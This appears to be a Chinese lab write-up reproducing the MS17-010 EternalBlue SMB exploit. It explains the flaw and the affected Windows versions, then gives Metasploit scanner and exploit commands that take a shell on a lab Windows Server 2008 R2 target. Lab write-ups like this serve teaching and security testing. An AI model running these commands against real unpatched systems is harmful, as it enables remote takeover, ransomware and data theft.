MS17-010

漏洞原理

        永恒之蓝(EternalBlue)是美国国家安全局(NSA)开发的漏洞利用程序,于2017年4月14日被黑客组织Shadow Brokers泄漏。该工具通过445/TCP和139端口来利用SMB协议远程代码执行漏洞(MS17-010)对Windows系统进行攻击。可用于对个人计算机和服务器植入木马、挖矿病毒、勒索软件等恶意程序。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

影响版本

 目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

实验环境:

        攻击机:kali-linux-2021.3       (192.168.11.205)

        靶机:Windows server 2008 R2  (192.168.11.242)

攻击过程

1.通过Nessus扫描得到报告显示,该服务器存在MS17-010。接下来进行漏洞复现


使用nmap扫描主机

 可以看到靶机开放了445端口

进入msfconsole

用MS17-010搜索

search MS17-010

 3:模块是漏洞发现模块RCE,0:漏洞利用模块

两个配合着使用

先用漏洞发现模块发现漏洞

 

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.11.242                  # 靶机IP
run

出现这行字表示发现漏洞

用漏洞利用模块拿到靶机shell

进入模块

use exploit/windows/smb/ms17_010_eternalblue
show options     # 查看参数
set rhost 192.168.11.242  # 设置靶机IP
run

拿到靶机shell

 

漏洞利用

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值